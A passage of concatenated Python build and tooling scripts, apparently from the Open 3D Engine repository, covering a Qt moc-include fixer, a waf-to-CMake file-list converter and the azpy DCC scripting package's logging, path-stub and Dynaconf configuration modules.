__future__ import (absolute_import, division, print_function, unicode_literals) import sys import json import os import re import subprocess import argparse mocre = re.compile(r'[\/<"](([^.\/<]*)\.moc)') alreadyFixedMocre = re.compile(r'[\/<"]moc_(([^.\/<]*)\.cpp)') includere = re.compile(r'^[\s]*#include[\s]?') qobjectre = re.compile(r'^[\s]*Q_OBJECT \/\/[\s]*AUTOMOC') qmocrun_start = '#if !defined(Q_MOC_RUN)' qmocrun_end = '#endif' header_extensions = ['.h', '.hxx'] def fixAutoMocHeader(input_file): try: with open(input_file, 'r') as source_file: print("Considering file {} for automoc fix".format(os.path.abspath(input_file))) fileLines = source_file.readlines() except (IOError, UnicodeDecodeError) as err: print('Error reading {}: {}'.format(input_file, err)) return for line_number in range(0, len(fileLines)): if fileLines[line_number].find(qmocrun_start) != -1: print("Already fixed file {}".format(os.path.abspath(input_file))) break reResult = qobjectre.search(fileLines[line_number]) if reResult: fixHFile(input_file) return def fixHFile(input_file): try: with open(input_file, 'r') as source_file: print("Considering file {} for header fix".format(os.path.abspath(input_file))) try: fileLines = source_file.readlines() except UnicodeDecodeError as err: print('Error reading file {}, err: {}'.format(input_file, err)) return first_include_line_number = -1 last_include_line_number = -1 for line_number in range(0, len(fileLines)): if fileLines[line_number].find(qmocrun_start) != -1: # Already injected Q_MOC_RUN guard print("Already fixed file {}".format(os.path.abspath(input_file))) break reResult = includere.search(fileLines[line_number]) if reResult: if first_include_line_number == -1: first_include_line_number = line_number last_include_line_number = line_number if first_include_line_number != -1 and last_include_line_number != -1: print('{}:{},{} Inserting Q_MOC_RUN'.format(os.path.abspath(input_file), first_include_line_number, last_include_line_number)) fileLines.insert(last_include_line_number+1, qmocrun_end + '\n') fileLines.insert(first_include_line_number, qmocrun_start +'\n') # p4 edit the file retProcess = subprocess.run(['p4', 'edit', input_file]) if retProcess.returncode != 0: print('Error opening {}: {}'.format(input_file, retProcess.returncode)) sys.exit(1) with open(input_file, 'w') as destination_file: destination_file.writelines(fileLines) except IOError as err: print('Error opening {}: {}'.format(input_file, err)) return def fixCppFile(input_file): # parse input file try: hasEdit = False with open(input_file, 'r') as source_file: print("Reading file " + os.path.abspath(input_file)) try: fileLines = source_file.readlines() except UnicodeDecodeError as err: print('Error reading file {}, err: {}'.format(input_file, err)) return for line_number in range(0, len(fileLines)): if alreadyFixedMocre.search(fileLines[line_number]): for h_extension in header_extensions: if os.path.exists(os.path.splitext(input_file)[0] + h_extension): fixHFile(os.path.splitext(input_file)[0] + h_extension) reResult = mocre.search(fileLines[line_number]) while reResult: # there is a match, we need to replace hasEdit = True # replace using the group newInclude = 'moc_' + reResult.group(2) + '.cpp' print('{}:{} Converting {} to {} '.format(os.path.abspath(input_file), line_number, reResult.group(1), newInclude)) fileLines[line_number] = fileLines[line_number].replace(reResult.group(1), newInclude) for h_extension in header_extensions: if os.path.exists(os.path.splitext(input_file)[0] + h_extension): 
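                        # a header with the same basename sits next to this .cpp
                        # file, so wrap its includes in Q_MOC_RUN guards as well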
fixHFile(os.path.splitext(input_file)[0] + h_extension) reResult = mocre.search(fileLines[line_number]) if hasEdit: # p4 edit the file retProcess = subprocess.run(['p4', 'edit', input_file]) if retProcess.returncode != 0: print('Error opening {}: {}'.format(input_file, retProcess.returncode)) sys.exit(1) with open(input_file, 'w') as destination_file: destination_file.writelines(fileLines) except IOError as err: print('Error opening {}: {}'.format(input_file, err)) return def fileMayRequireFixing(f): return os.path.splitext(f)[1].lower() == '.cpp' def main(): """script main function""" parser = argparse.ArgumentParser(description='This script converts includes of moc files from\n' '#include .*filename.moc -> #include .*moc_filename.cpp', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('file_or_dir', type=str, nargs='+', help='list of files or directories to search within for cpp files to fix up moc includes') args = parser.parse_args() for input_file in args.file_or_dir: if os.path.isdir(input_file): for dp, dn, filenames in os.walk(input_file): for f in filenames: extension = os.path.splitext(f)[1] extension_lower = extension.lower() if extension_lower == '.cpp': fixCppFile(os.path.join(dp, f)) elif extension_lower in header_extensions: fixAutoMocHeader(os.path.join(dp, f)) else: extension = os.path.splitext(input_file)[1] extension_lower = extension.lower() if extension_lower == '.cpp': fixCppFile(input_file) elif extension_lower in header_extensions: fixAutoMocHeader(input_file) #entrypoint if __name__ == '__main__': main() ``` #### File: o3de/cmake/waffiles2cmake.py ```python from __future__ import (absolute_import, division, print_function, unicode_literals) import sys import json import os import subprocess import argparse def get_banner(): return """# # Copyright (c) Contributors to the Open 3D Engine Project. For complete copyright and license terms please see the LICENSE at the root of this distribution. # # SPDX-License-Identifier: Apache-2.0 OR MIT # # """ def convertFile(input_file): filename = os.path.basename(input_file) path = os.path.dirname(os.path.abspath(input_file)) outFilename = (os.path.splitext(filename)[0] + '_files.cmake').lower() output_file = os.path.join(path, outFilename) print('Converting ' + os.path.abspath(input_file) + ' to ' + output_file) # parse input file try: with open(input_file, 'r') as source_file: waf_files = json.load(source_file) except IOError: print('Error opening ' + input_file) sys.exit(1) except ValueError: print('Error parsing ' + input_file + ': invalid JSON!') sys.exit(1) files_list = [] for (i, j) in waf_files.items(): for (k, grp) in j.items(): for fname in grp: files_list.append(fname) alreadyExists = os.path.exists(output_file) if alreadyExists: subprocess.run(['p4', 'edit', output_file]) # build output file list try: fhandle = open(output_file, 'w+') fhandle.write(get_banner() + '\nset(FILES\n') for fname in files_list: fhandle.write(' ' + fname + '\n') fhandle.write(')\n') except IOError: print('Error creating ' + output_file) if not alreadyExists: subprocess.run(['p4', 'add', output_file]) def convertPath(input_path): for dp, dn, filenames in os.walk(input_path): for f in filenames: if os.path.splitext(f)[1] == '.waf_files': convertFile(os.path.join(dp, f)) def main(): """script main function""" parser = argparse.ArgumentParser(description='wafffiles2cmake.py (will recursively convert all waf_files)\n' 'output: [file_or_dir. 
..].cmake\n', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('file_or_dir', type=str, nargs='+', help='list of files or directories to look for *.waf_files within and convert to cmake files') args = parser.parse_args() for input_file in args.file_or_dir: print(input_file) if os.path.splitext(input_file)[1] == '.waf_files': convertFile(input_file) elif os.path.isdir(input_file): for dp, dn, filenames in os.walk(input_file): for f in filenames: if os.path.splitext(f)[1] == '.waf_files': convertFile(os.path.join(dp, f)) #entrypoint if __name__ == '__main__': main() ``` #### File: DccScriptingInterface/azpy/__init__.py ```python __credits__ = ["<NAME>", "<NAME>"] __license__ = "EULA" __version__ = "0.0.1" __status__ = "Prototype" # -------------------------------------------------------------------------- # standard imports import sys import errno import os import os.path import site import re import logging as _logging # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- _ORG_TAG = 'Amazon_Lumberyard' _APP_TAG = 'DCCsi' _TOOL_TAG = 'azpy' _TYPE_TAG = 'module' _PACKAGENAME = _TOOL_TAG __all__ = ['config_utils', 'render', 'constants', 'return_stub', 'synthetic_env', 'env_base', 'env_bool', 'test', 'dev', 'lumberyard', 'marmoset'] # 'blender', 'maya', 'substance', 'houdini'] # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # _ROOT_LOGGER = _logging.getLogger() # only use this if debugging # https://stackoverflow.com/questions/56733085/how-to-know-the-current-file-path-after-being-frozen-into-an-executable-using-cx/56748839 #os.chdir(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))) # ------------------------------------------------------------------------- # global space # we need to set up basic access to the DCCsi _MODULE_PATH = os.path.realpath(__file__) # To Do: what if frozen? _DCCSIG_PATH = os.path.normpath(os.path.join(_MODULE_PATH, '../..')) _DCCSIG_PATH = os.getenv('DCCSIG_PATH', _DCCSIG_PATH) site.addsitedir(_DCCSIG_PATH) # azpy import azpy.return_stub as return_stub import azpy.env_bool as env_bool import azpy.constants as constants import azpy.config_utils as config_utils _G_DEBUG = env_bool.env_bool(constants.ENVAR_DCCSI_GDEBUG, False) _DCCSI_DEV_MODE = env_bool.env_bool(constants.ENVAR_DCCSI_DEV_MODE, False) # for py2.7 (Maya) we provide this, so we must assume some bootstrapping # has occured, see DccScriptingInterface\\config.py (_DCCSI_PYTHON_LIB_PATH) try: import pathlib except: import pathlib2 as pathlib from pathlib import Path if _G_DEBUG: print('DCCsi debug breadcrumb, pathlib is: {}'.format(pathlib)) # to be continued... 
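# The engine root below is resolved from the environment variable named by
# constants.ENVAR_LY_DEV when it is set, otherwise by walking up from the current
# working directory until an 'engine.json' stub is found via
# config_utils.get_stub_check_path().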
# get/set the project name _LY_DEV = os.getenv(constants.ENVAR_LY_DEV, config_utils.get_stub_check_path(in_path=os.getcwd(), check_stub='engine.json')) # get/set the project name _LY_PROJECT_NAME = os.getenv(constants.ENVAR_LY_PROJECT, config_utils.get_current_project().name) # project cache log dir path _DCCSI_LOG_PATH = Path(os.getenv(constants.ENVAR_DCCSI_LOG_PATH, Path(_LY_DEV, _LY_PROJECT_NAME, 'Cache', 'pc', 'user', 'log', 'logs'))) for handler in _logging.root.handlers[:]: _logging.root.removeHandler(handler) # very basic root logger for early debugging, flip to while 1: while 0: _logging.basicConfig(level=_logging.DEBUG, format=constants.FRMT_LOG_LONG, datefmt='%m-%d %H:%M') _logging.debug('azpy.rootlogger> root logger set up for debugging') # root logger # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def makedirs(folder, *args, **kwargs): """a makedirs for py2.7 support""" try: return os.makedirs(folder, exist_ok=True, *args, **kwargs) except TypeError: # Unexpected arguments encountered pass try: # Should work is TypeError was caused by exist_ok, eg., Py2 return os.makedirs(folder, *args, **kwargs) except OSError as e: if e.errno != errno.EEXIST: raise if os.path.isfile(folder): # folder is a file, raise OSError just like os.makedirs() in Py3 raise # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- class FileExistsError(Exception): """Implements a stand-in Exception for py2.7""" def __init__(self, message, errors): # Call the base class constructor with the parameters it needs super(FileExistsError, self).__init__(message) # Now for your custom code... 
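        # keep any extra error details on the instance for later inspection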
self.errors = errors if sys.version_info.major < 3: FileExistsError = FileExistsError # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def initialize_logger(name, log_to_file=False, default_log_level=_logging.NOTSET): """Start a azpy logger""" _logger = _logging.getLogger(name) _logger.propagate = False if not _logger.handlers: _log_level = int(os.getenv('DCCSI_LOGLEVEL', default_log_level)) if _G_DEBUG: _log_level = int(10) # force when debugging print('_log_level: {}'.format(_log_level)) if _log_level: ch = _logging.StreamHandler(sys.stdout) ch.setLevel(_log_level) formatter = _logging.Formatter(constants.FRMT_LOG_LONG) ch.setFormatter(formatter) _logger.addHandler(ch) _logger.setLevel(_log_level) else: _logger.addHandler(_logging.NullHandler()) # optionally add the log file handler (off by default) if log_to_file: _logger.info('DCCSI_LOG_PATH: {}'.format(_DCCSI_LOG_PATH)) try: # exist_ok, isn't available in py2.7 pathlib # because it doesn't exist for os.makedirs # pathlib2 backport used instead (see above) if sys.version_info.major >= 3: _DCCSI_LOG_PATH.mkdir(parents=True, exist_ok=True) else: makedirs(str(_DCCSI_LOG_PATH.resolve())) # py2.7 except FileExistsError: # except FileExistsError: doesn't exist in py2.7 _logger.debug("Folder is already there") else: _logger.debug("Folder was created") _log_filepath = Path(_DCCSI_LOG_PATH, '{}.log'.format(name)) try: _log_filepath.touch(mode=0o666, exist_ok=True) except FileExistsError: _logger.debug("Log file is already there: {}".format(_log_filepath)) else: _logger.debug("Log file was created: {}".format(_log_filepath)) if _log_filepath.exists(): file_formatter = _logging.Formatter(constants.FRMT_LOG_LONG) file_handler = _logging.FileHandler(str(_log_filepath)) file_handler.setLevel(_logging.DEBUG) file_handler.setFormatter(file_formatter) _logger.addHandler(file_handler) return _logger # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # set up logger with both console and file _logging if _G_DEBUG: _LOGGER = initialize_logger(_PACKAGENAME, log_to_file=True) else: _LOGGER = initialize_logger(_PACKAGENAME, log_to_file=False) _LOGGER.debug('Invoking __init__.py for {0}.'.format({_PACKAGENAME})) # some simple logger tests # evoke the filehandlers and test writting to the log file if _G_DEBUG: _LOGGER.info('Forced Info! for {0}.'.format({_PACKAGENAME})) _LOGGER.error('Forced ERROR! for {0}.'.format({_PACKAGENAME})) # debug breadcrumbs to check this module and used paths _LOGGER.debug('MODULE_PATH: {}'.format(_MODULE_PATH)) _LOGGER.debug('LY_DEV_PATH: {}'.format(_LY_DEV)) _LOGGER.debug('DCCSI_PATH: {}'.format(_DCCSIG_PATH)) _LOGGER.debug('LY_PROJECT_TAG: {}'.format(_LY_PROJECT_NAME)) _LOGGER.debug('DCCSI_LOG_PATH: {}'.format(_DCCSI_LOG_PATH)) # ------------------------------------------------------------------------- def test_imports(_all=__all__, _pkg=_PACKAGENAME, _logger=_LOGGER): # If in dev mode this will test imports of __all__ _logger.debug("~ Import triggered from: {0}".format(_pkg)) import importlib for pkgStr in _all: try: # this is py2.7 compatible # in py3.5+, we can use importlib.util instead importlib.import_module('.' 
+ pkgStr, _pkg) _logger.debug("~ Imported module: {0}".format(pkgStr)) except Exception as e: _logger.warning('~ {0}'.format(e)) _logger.warning("~ {0} :: ImportFail".format(pkgStr)) return False return True # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- if _DCCSI_DEV_MODE: # If in dev mode this will test imports of __all__ _LOGGER.debug('Testing Imports: {0}'.format(_PACKAGENAME)) test_imports(__all__) # ------------------------------------------------------------------------- del _LOGGER ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == '__main__': _G_DEBUG = True _DCCSI_DEV_MODE = True if _G_DEBUG: print(_DCCSIG_PATH) test_imports() ``` #### File: maya/utils/execute_wing_code.py ```python import os import socket import logging as _logging # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def get_stub_check_path(in_path=__file__, check_stub='engineroot.txt'): ''' Returns the branch root directory of the dev\\'engineroot.txt' (... or you can pass it another known stub) so we can safely build relative filepaths within that branch. If the stub is not found, it returns None ''' path = os.path.abspath(os.path.join(os.path.dirname(in_path), "..")) _LOGGER.info('parent dir: {}'.format(path)) while 1: test_path = os.path.join(path, check_stub) if os.path.isfile(test_path): return os.path.abspath(os.path.join(os.path.dirname(test_path))) else: path, tail = (os.path.abspath(os.path.join(os.path.dirname(test_path), "..")), os.path.basename(test_path)) if (len(tail) == 0): return None # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # -- Global Definitions -- _MODULENAME = 'azpy.maya.utils.execute_wing_code' _LOGGER = _logging.getLogger(_MODULENAME) _LY_DEV = get_stub_check_path() _LOGGER.info('_LY_DEV: {}'.format(_LY_DEV)) _PROJ_CACHE = os.path.join(_LY_DEV, 'cache', 'DCCsi', 'wing') _LOGGER.info('_PROJ_CACHE: {}'.format(_PROJ_CACHE)) _LOCAL_HOST = socket.gethostbyname(socket.gethostname()) _LOGGER.info('local_host: {}'.format(_LOCAL_HOST)) # ------------------------------------------------------------------------- ########################################################################### # --main code block-------------------------------------------------------- def main(code_type='python'): """ Evaluate the temp file on disk, made by Wing, in Maya. code_type : string : Supports either 'python' or 'mel' """ temp_file_name = 'tmp_wing_data.txt' temp_file_path = os.path.join(_PROJ_CACHE, temp_file_name) temp_file_path = os.path.abspath(temp_file_path) temp_file = temp_file_path.replace("\\", "/") # maya is linux paths? _LOGGER.debug('temp_file_path is: {}'.format(temp_file_path)) if os.access(temp_file, os.F_OK): # open and print the file in Maya: f = open(temp_file, "r") lines = f.readlines() for line in lines: print(line.rstrip()) f.close() if code_type == "python": # execute the file contents in Maya: f = open(temp_file, "r") # (1) doesn't work? 
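            # Three ways of executing the temp file are sketched here: (1) exec on
            # the open file object and (2) exec-ing line by line are kept only as
            # commented-out history; (3) compiling the whole file and exec-ing the
            # resulting code object is the approach actually used below.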
#exec(f, __main__.__dict__, __main__.__dict__) # (2) works is series of single expressions #for line in lines: #exec(line.rstrip()) # f.close() # (3) this seems to work much better temp_code_file_name = 'temp_code.py' temp_code_file = os.path.join(_PROJ_CACHE, temp_code_file_name) temp_code_file = os.path.abspath(temp_code_file) temp_code = temp_file_path.replace("\\", "/") # maya is linux paths? code = compile(f.read(), temp_code, 'exec') _LOGGER.debug(type(code)) exec(code) elif code_type == "mel": mel_cmd = "source '{}'".format(temp_file) # This causes the "// Result: " line to show up in the Script Editor: om.MGlobal.executeCommand(mel_cmd, True, True) else: _LOGGER.warning("No temp file exists: {}".format(temp_file)) file=open(temp_file, "w") file.write("test file write") if os.path.isfile(temp_file): _LOGGER.info('Created the temp file, please try again!') else: _LOGGER.error('File not created: {}'.format(temp_file)) return # ------------------------------------------------------------------------- ``` #### File: DccScriptingInterface/azpy/return_stub.py ```python import os import sys import logging as _logging # -------------------------------------------------------------------------- # ------------------------------------------------------------------------- # global space debug flag, no fancy stuff here we use in bootstrap _G_DEBUG = False # manually enable to debug this file _PACKAGENAME = __name__ if _PACKAGENAME is '__main__': _PACKAGENAME = 'azpy.return_stub' _LOGGER = _logging.getLogger(_PACKAGENAME) _LOGGER.debug('Initializing: {0}.'.format({_PACKAGENAME})) __all__ = ['return_stub'] # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def return_stub(stub): _dir_to_last_file = None '''Take a file name (stub) and returns the directory of the file (stub)''' if _dir_to_last_file is None: path = os.path.abspath(__file__) while 1: path, tail = os.path.split(path) if (os.path.isfile(os.path.join(path, stub))): break if (len(tail) == 0): path = "" if _G_DEBUG: _LOGGER.debug('~ Debug Message: I was not able to find the ' 'path to that file (stub) in a walk-up ' 'from currnet path') break _dir_to_last_file = path return _dir_to_last_file # -------------------------------------------------------------------------- ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == '__main__': # there are not really tests to run here due to this being a list of # constants for shared use. # happy print _LOGGER.info("# {0} #".format('-' * 72)) _LOGGER.info('~ find_stub.py ... 
Running script as __main__') _LOGGER.info("# {0} #\r".format('-' * 72)) _LOGGER.info('~ Current Work dir: {0}'.format(os.getcwd())) _LOGGER.info('~ Dev\: {0}'.format(return_stub('engineroot.txt'))) # custom prompt sys.ps1 = "[azpy]>>" ``` #### File: TechnicalArt/DccScriptingInterface/config.py ```python import os import sys import site import re # 3rdParty (possibly) py3 ships with pathlib, 2.7 does not # import pathlib # our framework for dcc tools need to run in apps like Maya that may still be # on py27 so we need to import and use after some boostrapping # -------------------------------------------------------------------+------ #os.environ['PYTHONINSPECT'] = 'True' _MODULE_PATH = os.path.abspath(__file__) # we don't have access yet to the DCCsi Lib\site-packages # (1) this will give us import access to azpy (always?) _DCCSIG_PATH = os.getenv('DCCSIG_PATH', os.path.abspath(os.path.dirname(_MODULE_PATH))) # ^ we assume this config is in the root of the DCCsi # if it's not, be sure to set envar 'DCCSIG_PATH' to ensure it site.addsitedir(_DCCSIG_PATH) # PYTHONPATH # now we have azpy api access import azpy from azpy.env_bool import env_bool from azpy.constants import ENVAR_DCCSI_GDEBUG from azpy.constants import ENVAR_DCCSI_DEV_MODE # set up global space, logging etc. # set these true if you want them set globally for debugging _DCCSI_GDEBUG = env_bool(ENVAR_DCCSI_GDEBUG, False) _DCCSI_DEV_MODE = env_bool(ENVAR_DCCSI_DEV_MODE, False) _PACKAGENAME = 'DCCsi.config' _LOG_LEVEL = int(20) if _DCCSI_GDEBUG: _LOG_LEVEL = int(10) _LOGGER = azpy.initialize_logger(_PACKAGENAME, log_to_file=False, default_log_level=_LOG_LEVEL) _LOGGER.info('Starting up: {}.'.format({_PACKAGENAME})) _LOGGER.info('site.addsitedir({})'.format(_DCCSIG_PATH)) _LOGGER.debug('_DCCSI_GDEBUG: {}'.format(_DCCSI_GDEBUG)) _LOGGER.debug('_DCCSI_DEV_MODE: {}'.format(_DCCSI_DEV_MODE)) # early attach WingIDE debugger (can refactor to include other IDEs later) if _DCCSI_DEV_MODE: from azpy.test.entry_test import connect_wing foo = connect_wing() # to do: ^ this should be replaced with full featured azpy.dev.util # that supports additional debuggers (pycharm, vscode, etc.) 
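# A minimal sketch of opting into the debugger attach above, assuming the
# ENVAR_DCCSI_DEV_MODE constant resolves to an environment variable named
# DCCSI_DEV_MODE (shell lines are illustrative only):
#   set DCCSI_DEV_MODE=True      :: Windows cmd, before launching the tool
#   export DCCSI_DEV_MODE=True   # bash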
# ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # (2) this will give us import access to modules we provide _DCCSI_PYTHON_LIB_PATH = azpy.config_utils.bootstrap_dccsi_py_libs(_DCCSIG_PATH) # Now we should be able to just carry on with pth lib and dynaconf from dynaconf import Dynaconf try: import pathlib except: import pathlib2 as pathlib from pathlib import Path _DCCSIG_PATH = Path(_DCCSIG_PATH).resolve() _DCCSI_PYTHON_LIB_PATH = Path(_DCCSI_PYTHON_LIB_PATH).resolve() # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def init_ly_pyside(LY_DEV=None): """sets access to lumberyards Qt dlls and PySide""" LY_DEV = Path(LY_DEV).resolve() if not LY_DEV.exists(): raise Exception('LY_DEV does NOT exist: {0}'.format(LY_DEV)) else: # to do: 'windows_vs2019' might change or be different locally # 'windows_vs2019' is defined as a str tag in constants # we may not yet have access to azpy.constants :( from azpy.constants import TAG_DIR_LY_BUILD from azpy.constants import PATH_LY_BUILD_PATH from azpy.constants import PATH_LY_BIN_PATH # to do: pull some of these str and tags from constants LY_BUILD_PATH = Path.joinpath(LY_DEV, TAG_DIR_LY_BUILD).resolve() LY_BIN_PATH = Path.joinpath(LY_BUILD_PATH, 'bin', 'profile').resolve() # # allows to retreive from settings.QTFORPYTHON_PATH # from azpy.constants import STR_QTFORPYTHON_PATH # a path string constructor # QTFORPYTHON_PATH = Path(STR_QTFORPYTHON_PATH.format(LY_DEV)).resolve() # os.environ["DYNACONF_QTFORPYTHON_PATH"] = str(QTFORPYTHON_PATH) # site.addsitedir(str(QTFORPYTHON_PATH)) # PYTHONPATH QT_PLUGIN_PATH = Path.joinpath(LY_BIN_PATH, 'EditorPlugins').resolve() os.environ["DYNACONF_QT_PLUGIN_PATH"] = str(QT_PLUGIN_PATH) os.environ['PATH'] = QT_PLUGIN_PATH.as_posix() + os.pathsep + os.environ['PATH'] QT_QPA_PLATFORM_PLUGIN_PATH = Path.joinpath(QT_PLUGIN_PATH, 'platforms').resolve() os.environ["DYNACONF_QT_QPA_PLATFORM_PLUGIN_PATH"] = str(QT_QPA_PLATFORM_PLUGIN_PATH) # if the line below is removed external standalone apps can't load PySide2 os.environ["QT_QPA_PLATFORM_PLUGIN_PATH"] = str(QT_QPA_PLATFORM_PLUGIN_PATH) # ^^ bypass trying to set only with DYNACONF environment os.environ['PATH'] = QT_QPA_PLATFORM_PLUGIN_PATH.as_posix() + os.pathsep + os.environ['PATH'] # ^^ this particular env only works correctly if put on the PATH in this manner # add Qt binaries to the Windows path to handle findings DLL file dependencies if sys.platform.startswith('win'): # path = os.environ['PATH'] # newPath = '' # newPath += str(LY_BIN_PATH) + os.pathsep # newPath += str(Path.joinpath(QTFORPYTHON_PATH, # 'shiboken2').resolve()) + os.pathsep # newPath += str(Path.joinpath(QTFORPYTHON_PATH, # 'PySide2').resolve()) + os.pathsep # newPath += path # os.environ['PATH']=newPath _LOGGER.debug('PySide2 bootstrapped PATH for Windows.') try: import PySide2 _LOGGER.debug('DCCsi, config.py: SUCCESS: import PySide2') _LOGGER.debug(PySide2) status = True except ImportError as e: _LOGGER.debug('DCCsi, config.py: FAILURE: import PySide2') status = False raise(e) try: import shiboken2 _LOGGER.debug('DCCsi, config.py: SUCCESS: import shiboken2') _LOGGER.debug(shiboken2) status = True except ImportError as e: _LOGGER.debug('DCCsi, config.py: FAILURE: import shiboken2') status = False raise(e) # set up the pyside2-tools (pyside2uic) # to do: move path construction string to constants and 
build off of SDK # have not done that yet as I really want to get legal approval and # add this to the QtForPython Gem # please pass this on the current code review DCCSI_PYSIDE2_TOOLS = Path.joinpath(LY_DEV, 'Gems', 'AtomLyIntegration', 'TechnicalArt', 'DccScriptingInterface', '.dev', 'QtForPython', 'pyside2-tools-dev') os.environ["DYNACONF_DCCSI_PYSIDE2_TOOLS"] = str(DCCSI_PYSIDE2_TOOLS.resolve()) os.environ['PATH'] = DCCSI_PYSIDE2_TOOLS.as_posix() + os.pathsep + os.environ['PATH'] return status # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- def test_pyside2(): """Convenience method to test Qt / PySide2 access""" # now test _LOGGER.info('Testing Qt / PySide2') try: from PySide2.QtWidgets import QApplication, QPushButton app = QApplication(sys.argv) hello = QPushButton("Hello world!") hello.resize(200, 60) hello.show() except Exception as e: _LOGGER.error('FAILURE: Qt / PySide2') status = False raise(e) _LOGGER.info('SUCCESS: .test_pyside2()') sys.exit(app.exec_()) # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # `envvar_prefix` = export envvars with `export DYNACONF_FOO=bar`. # `settings_files` = Load this files in the order. # here we are modifying or adding to the dynamic config settings on import settings = Dynaconf( envvar_prefix="DYNACONF", settings_files=['settings.json', '.secrets.json'], ) from azpy.constants import PATH_LY_BUILD_PATH from azpy.constants import PATH_LY_BIN_PATH # global settings os.environ["DYNACONF_DCCSI_GDEBUG"] = str(_DCCSI_GDEBUG) os.environ["DYNACONF_DCCSI_DEV_MODE"] = str(_DCCSI_DEV_MODE) # search up to get \dev _LY_DEV = azpy.config_utils.get_stub_check_path(in_path=_DCCSIG_PATH, check_stub='engine.json') os.environ["DYNACONF_LY_DEV"] = str(_LY_DEV.resolve()) _LY_PROJECT = azpy.config_utils.get_current_project() os.environ["DYNACONF_LY_PROJECT"] = str(_LY_PROJECT.resolve()) _LY_PROJECT_PATH = Path(_LY_DEV, _LY_PROJECT) os.environ["DYNACONF_LY_PROJECT_PATH"] = str(_LY_PROJECT_PATH) os.environ["DYNACONF_DCCSIG_PATH"] = str(_DCCSIG_PATH) _DCCSI_CONFIG_PATH = Path(_MODULE_PATH).resolve() os.environ["DYNACONF_DCCSI_CONFIG_PATH"] = str(_DCCSI_CONFIG_PATH) _DCCSIG_SDK_PATH = Path.joinpath(_DCCSIG_PATH, 'SDK').resolve() os.environ["DYNACONF_DCCSIG_SDK_PATH"] = str(_DCCSIG_SDK_PATH) os.environ["DYNACONF_DCCSI_PYTHON_LIB_PATH"] = str(_DCCSI_PYTHON_LIB_PATH) os.environ["DYNACONF_OS_FOLDER"] = azpy.config_utils.get_os() # we need to set up the Ly dev build \bin\path (for Qt dll access) _LY_BUILD_PATH = Path(PATH_LY_BUILD_PATH).resolve() os.environ["DYNACONF_LY_BUILD_PATH"] = str(_LY_BUILD_PATH) _LY_BIN_PATH = Path(PATH_LY_BIN_PATH).resolve() os.environ["DYNACONF_LY_BIN_PATH"] = str(_LY_BIN_PATH) # project cache log dir path from azpy.constants import ENVAR_DCCSI_LOG_PATH from azpy.constants import PATH_DCCSI_LOG_PATH _DCCSI_LOG_PATH = Path(os.getenv(ENVAR_DCCSI_LOG_PATH, Path(PATH_DCCSI_LOG_PATH.format(LY_DEV=_LY_DEV, LY_PROJECT=_LY_PROJECT)))) os.environ["DYNACONF_DCCSI_LOG_PATH"] = str(_DCCSI_LOG_PATH) # hard checks if not _LY_BIN_PATH.exists(): raise Exception('LY_BIN_PATH does NOT exist: {0}'.format(_LY_BIN_PATH)) else: # adding to sys.path apparently doesn't work for .dll locations like Qt os.environ['PATH'] = _LY_BIN_PATH.as_posix() + os.pathsep + os.environ['PATH'] _LOGGER.info('Dynaconf config.py ... 
DONE') # ------------------------------------------------------------------------- # ------------------------------------------------------------------------- # settings.setenv() # doing this will add the additional DYNACONF_ envars def get_config_settings(setup_ly_pyside=False): """Convenience method to set and retreive settings directly from module.""" from dynaconf import settings if setup_ly_pyside: init_ly_pyside(settings.LY_DEV) settings.setenv() return settings # --- END ----------------------------------------------------------------- ########################################################################### # Main Code Block, runs this script as main (testing) # ------------------------------------------------------------------------- if __name__ == '__main__': """Run this file as main""" _LOG_LEVEL = int(10) # same as _logging.DEBUG _LOGGER = azpy.initialize_logger(_PACKAGENAME, log_to_file=True, default_log_level=_LOG_LEVEL) from dynaconf import settings # not using fstrings in this module because it might run in py2.7 (maya) _LOGGER.info('DCCSI_GDEBUG: {}'.format(settings.DCCSI_GDEBUG)) _LOGGER.info('DCCSI_DEV_MODE: {}'.format(settings.DCCSI_DEV_MODE)) _LOGGER.info('DCCSI_LOGLEVEL: {}'.format(settings.DCCSI_LOGLEVEL)) _LOGGER.info('OS_FOLDER: {}'.format(settings.OS_FOLDER)) _LOGGER.info('LY_PROJECT: {}'.format(settings.LY_PROJECT)) _LOGGER.info('LY_PROJECT_PATH: {}'.format(settings.LY_PROJECT_PATH)) _LOGGER.info('LY_DEV: {}'.format(settings.LY_DEV)) _LOGGER.info('LY_BUILD_PATH: {}'.format(settings.LY_BUILD_PATH)) _LOGGER.info('LY_BIN_PATH: {}'.format(settings.LY_BIN_PATH)) _LOGGER.info('DCCSI_LOG_PATH: {}'.format(settings.DCCSI_LOG_PATH)) _LOGGER.info('DCCSI_CONFIG_PATH: {}'.format(settings.DCCSI_CONFIG_PATH)) _LOGGER.info('DCCSIG_PATH: {}'.format(settings.DCCSIG_PATH)) _LOGGER.info('DCCSI_PYTHON_LIB_PATH: {}'.format(settings.DCCSI_PYTHON_LIB_PATH)) _LOGGER.info('DDCCSI_PY_BASE: {}'.format(settings.DDCCSI_PY_BASE)) # To Do: These should ONLY be set for Lumberyard and non-DCC environments # They will most likely cause Qt/PySide DCC apps to fail # or hopefully they can be overridden for DCC envionments # that provide their own Qt dlls and Pyside2 #_LOGGER.info('QTFORPYTHON_PATH: {}'.format(settings.QTFORPYTHON_PATH)) #_LOGGER.info('QT_PLUGIN_PATH: {}'.format(settings.QT_PLUGIN_PATH)) init_ly_pyside(settings.LY_DEV) # init lumberyard Qt/PySide2 # from dynaconf import settings # <-- no need to reimport settings.setenv() # doing this will add/set the additional DYNACONF_ envars #_LOGGER.info('QTFORPYTHON_PATH: 